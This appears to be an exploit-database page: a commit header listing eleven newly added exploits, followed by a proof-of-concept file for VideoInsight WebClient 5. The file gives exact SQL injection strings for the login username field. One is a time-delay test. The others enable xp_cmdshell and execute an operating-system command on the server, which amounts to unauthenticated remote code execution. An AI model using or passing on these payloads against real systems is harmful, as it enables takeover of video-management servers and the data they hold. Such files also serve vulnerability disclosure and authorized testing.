ac267cb298
11 changes to exploits/shellcodes Redis 5.0 - Denial of Service ntp 4.2.8p11 - Local Buffer Overflow (PoC) Windows 10 - Desktop Bridge Activation Arbitrary Directory Creation Privilege Escalation Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution Mirasys DVMS Workstation 5.12.6 - Path Traversal MaDDash 2.0.2 - Directory Listing NewMark CMS 2.1 - 'sec_id' SQL Injection TP-Link TL-WA850RE - Remote Command Execution Apache CouchDB < 2.1.0 - Remote Code Execution IPConfigure Orchid VMS 2.0.5 - Directory Traversal Information Disclosure (Metasploit) VideoInsight WebClient 5 - SQL Injection
26 lines
No EOL
1.1 KiB
Text
26 lines
No EOL
1.1 KiB
Text
# Title: VideoInsight WebClient 5 - SQL Injection
|
|
# Date: 2018-05-06
|
|
# Author: vosec
|
|
# Vendor Homepage: https://www.security.us.panasonic.com/
|
|
# Software Link: https://www.security.us.panasonic.com/video-management-software/web-client/
|
|
# Version: 5
|
|
# Tested on: Windows Server 2008 R2
|
|
# CVE: N/A
|
|
|
|
# Description:
|
|
# This exploit is based on CVE-2017-5151 targeting versions prior.
|
|
# The txtUserName and possibly txtPassword field contain an unauthenticated SQL injection vulnerability
|
|
# that can be used for remote code execution.
|
|
|
|
# SQL Injection - PoC
|
|
# From the web login page submit the following string as the username with anything in the password field.
|
|
# The web server will hang for 5 seconds:
|
|
|
|
UyYr');WAITFOR DELAY '00:00:05'--
|
|
|
|
# Remote Code Execution - PoC
|
|
# From the web login page submit each of the following strings as the username, one at a time, with anything
|
|
# in the password field (with the ping, use a valid IP address that you can monitor):
|
|
UyYr');EXEC sp_configure 'show advanced options', 1;RECONFIGURE;--
|
|
UyYr');EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
|
|
UyYr');EXEC xp_cmdshell 'ping xxx.xxx.xxx.xxx';-- |